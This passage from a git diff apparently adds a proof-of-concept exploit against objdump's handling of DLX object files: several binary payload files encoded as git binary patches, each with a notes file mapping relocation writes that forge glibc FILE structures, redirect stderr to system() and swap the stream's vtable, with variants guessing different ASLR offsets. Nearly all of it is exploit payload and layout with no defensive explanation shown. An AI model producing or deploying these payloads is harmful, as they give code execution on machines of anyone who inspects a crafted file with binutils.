target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..088ecfa3282e9ebdf427d469442ee9e63501a19a GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWkzJY?m^?dgyxtWEy^n;o6o%5Z{%$qn}2C!2+`Yqt3JnyOq)R8BqfO^4cASwDG&_Lew0Hg#Tfkwe64#8*O1JUjU zng#oS7Wv&@pw%Wn2HHeF0op~s20BE)0n(!10-eE!Iod~Y3 zC%nPWA#%%Cf{Vre7w*K5qTPb$c|@lp;12URPvUy;U##9}_?rzs&yA;;KW+HC41bSN z=Y7@e-*40hjQUV2#9du~-td1n{7d9=uhD(3 zFqeqnCs~p*>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7yguy`BBLK-rf3juv0{)RM@NG`e?trokvEOO9B22v+#^>0qHRr(L0xy zFFh4SlqV^~`*DJtZ=@1YElq{}kGZgNNt7Y$`1ed~;E=u$9)`uWtP7Gl4z{}Qm);x> bIYGi+<+SOi!4&PAm10%5&za9ud2sd@eL8;~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..1662f26 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..a4ae6166a84e2aed66c5ee871a79d35c7804bfb7 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuP$$-#|g(_I&pzxtWEy^n;o6o%5Z{%$)X=2m9S6=YyCI#m|*|&YdL@Z ziX`eQ-glK)_kf+^(H{UO<#{(HppHB-3DgTt0ZGvhfd=vqk3dTB31}32<`8@Vnuzvi zpjogFXp!Gt0IfFp8PF#BInXZp9nc~AJ&+dt0r*J$whic{?o0w*)SW4yTlDY1r$lgd zJ>d=ZhR7{n2`(1Vks{yU>wHmHRpcS+WorTUpk3x?@=b^`;Cs>j)>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7f;H_Y!wT~+nc)wKTF6Q758emKHV?>C?KQDM*;4HS$M{`fb^J*=$*^U zm!66u%99l0{Wwm}H&ThHmZrk~$81=+Cd!a?{Cg%ga7bSW55wYG))h$|2V33uOK%Q^ boFHMZaN6+GV2bw5O0lZjf0$2Kd2sgseLR01 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..84b0976 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..1b682a906e8579deaa1680782783307efb821573 GIT binary patch literal 1280 zcmd5*T}vB56g`{W7-OqOqqfn44+<6nv9nQ=5~ZbLEwo^v4~6<5hQ<%DMw|$Wf`7q3 z;gj?~^s((P2(jV?_OIe3vpPV&Y33!``WL~ z_}{0@2T-1vpvH`_Tl_E(f!N0&m zqCE!m3O)h)L)3rffMM!R4H%*B%ma@^e*-*D z1+6QD9UKjjNB$$YS>ku$N&Kg1x8Qjm(HRW5!#v3|Xit7k)O!qnui@vtag*@p4gZMY zFBo<9tKMlMT4S4(W2;4G%30iZHhjZ zK3Ddk&!x}h`zy5?hb@#oH|htQYumdUO_cT FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..8f5ab73c550552a01b1a4903ce864a89a5e4d211 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{75oDQh4$Qj*;5P2G8d}OJ@=luRek5yueopYR?0$b*7^ngM8JOVb3^{# zk2Gpy?SJK1w}74D)$af&<9XL5poTm(0n`dk0%?htfjaVrM<65k1k?*Ya|ylxjYPW} zXcGJke30Lr1I;%1DbOPEGoV%CH$Yb6w?Izfcfd!+|F!^aj5`xRJLAqI@JZr}Ku0QQ zU1!+At`K?TJH}#(|Ai;QLuW=kopKE5)A`Wv3?e+BZDfExe+ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..056e0d2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..7c5ed7091b8c1afe535eb3d5e2fff048344eaee5 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{7XLs&p*^=>_S8bM%!R6R&%I}ERo}VwYwp{;m9h|pQb zBaPZv`(HWMEnsJO^*g}Hc;0mhs3A{H0JVaXKw9EuppLxZ5y%KW0ri5Hzuyf>Z``kbL}H}suG zp8cvizsJabG4g%oLAh>x{{cfkXy^;2+56=8jT(CPyXySuWxsq}f7Z}182Tl0>1))_ zW%^SLodAJzktk`tmvJ~ z%a@soEb`L~BiB&o)^W*P2oKF-E$cT)4Hrk<*UM}U dgq$E|uW;M&-C&E(ElBb$ZeP-$dgH;}Ujg*rfE)k- literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..0677195 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..4c4baf7179fc6ad2ad3f015828f37e020eacbb59 GIT binary patch literal 1280 zcmd5*+e%wO6kR9h#27F2l4^}D^r3=+5IZN)L{t<+Ewo^v4~6zY6ypW7hD-_-h5mv+ z;gk3eeXRY0KzuFq4-^!RYoD7Z^HBQO4Kr)6y;t_k+1c}b<=v{4vJji~>70HdVE^%R zC4Zkl1|6~XzjCY=U}t&tYrx5R-qjJ1CQr=)9fI>fM&dP~lf3%|$O_&9U4nO9g7-iV z(S8o}3cdiI$nVa8KAZdm=$H5@Fd*?JFevdBkdyc|@Radi{lF08&KxkzxHAttllU88 zBo(wSA9ipwL>~DUW3j~l!jt$>lw0sTkLU~r+@YW388pW(6ZtMf-)rc3Z`>vHIYU2e z=<`ON{c1b^rICMS5E1DLqKExv5o83&bC|8+tsbFyBqsoc8*Y}R}b2_K0a)0ZlRzX^#J!mFTCTwfXtYz z=$*^Umzjzz@-qx1=dnW0HxgTv%Q3?F$5NR2Nt7jZ{5}&qxnwSchi0*s^@AkM#ZmY5 gGMkejCy3eaxqbHCV2jQzO7byoU(jE8 FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..25023215a008bd50ba066e8b92e6c9603f597d1e GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+K$GkGiuZXvWTD{v{OAkQAtQJ5ez7}5Og7mVp>);S1kMF;5BhV_2IA zzoT%`TKE1}iS+>3Szf&gIN2chRt8$gGjl+z;5^`p{sm|w@AwI11%CnUf;BF|-@p^1 z{T%2Nd;vU_zqZg&+usPA=jO^E7vHKYWv_w;TRW!_Rx8mh$Hff4|`$ zH0tbE)A=ur`YWS8QZ7(w+<(mQj~o7C`R$Lif7U4T~5K6DX!0(ug93VIrP26~nyDYLF$UZr$Wfwx=Q`TA*V|7foa@3?f(#P#W6WqSvnt{g}BInLrc{tL*A$x7b2 zynLCdB$C{vke FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe5f17101db92139bbeea0cba41a326f16d01e99 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWi_y!6J*Yn+<B90iD`BA$*2Wq0m|)-gwVXeH zK@#;9@4HH@8^BKS=(m8A^1Q1eP)DAa0_p{)fu!h%Km&Qx1CSDY1R4dOI0T=84@A2c zXcp`PTI6?sfmWOR7-$py1ZWri8t4%H21tv33v^Qd-v)f7?o0t))SYSIljw^;cOtmD zp6~`ghsZ5o2`(1!bbhb{-jBE(Q2A%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5c#pzL82qwKNs>Kjy;9B~gZ~ FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..088ecfa3282e9ebdf427d469442ee9e63501a19a GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWkzJY?m^?dgyxtWEy^n;o6o%5Z{%$qn}2C!2+`Yqt3JnyOq)R8BqfO^4cASwDG&_Lew0Hg#Tfkwe64#8*O1JUjU zng#oS7Wv&@pw%Wn2HHeF0op~s20BE)0n(!10-eE!Iod~Y3 zC%nPWA#%%Cf{Vre7w*K5qTPb$c|@lp;12URPvUy;U##9}_?rzs&yA;;KW+HC41bSN z=Y7@e-*40hjQUV2#9du~-td1n{7d9=uhD(3 zFqeqnCs~p*>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7yguy`BBLK-rf3juv0{)RM@NG`e?trokvEOO9B22v+#^>0qHRr(L0xy zFFh4SlqV^~`*DJtZ=@1YElq{}kGZgNNt7Y$`1ed~;E=u$9)`uWtP7Gl4z{}Qm);x> bIYGi+<+SOi!4&PAm10%5&za9ud2sd@eL8;~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..a68f6bc --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..a4ae6166a84e2aed66c5ee871a79d35c7804bfb7 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuP$$-#|g(_I&pzxtWEy^n;o6o%5Z{%$)X=2m9S6=YyCI#m|*|&YdL@Z ziX`eQ-glK)_kf+^(H{UO<#{(HppHB-3DgTt0ZGvhfd=vqk3dTB31}32<`8@Vnuzvi zpjogFXp!Gt0IfFp8PF#BInXZp9nc~AJ&+dt0r*J$whic{?o0w*)SW4yTlDY1r$lgd zJ>d=ZhR7{n2`(1Vks{yU>wHmHRpcS+WorTUpk3x?@=b^`;Cs>j)>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7f;H_Y!wT~+nc)wKTF6Q758emKHV?>C?KQDM*;4HS$M{`fb^J*=$*^U zm!66u%99l0{Wwm}H&ThHmZrk~$81=+Cd!a?{Cg%ga7bSW55wYG))h$|2V33uOK%Q^ boFHMZaN6+GV2bw5O0lZjf0$2Kd2sgseLR01 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..eff03e0 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb 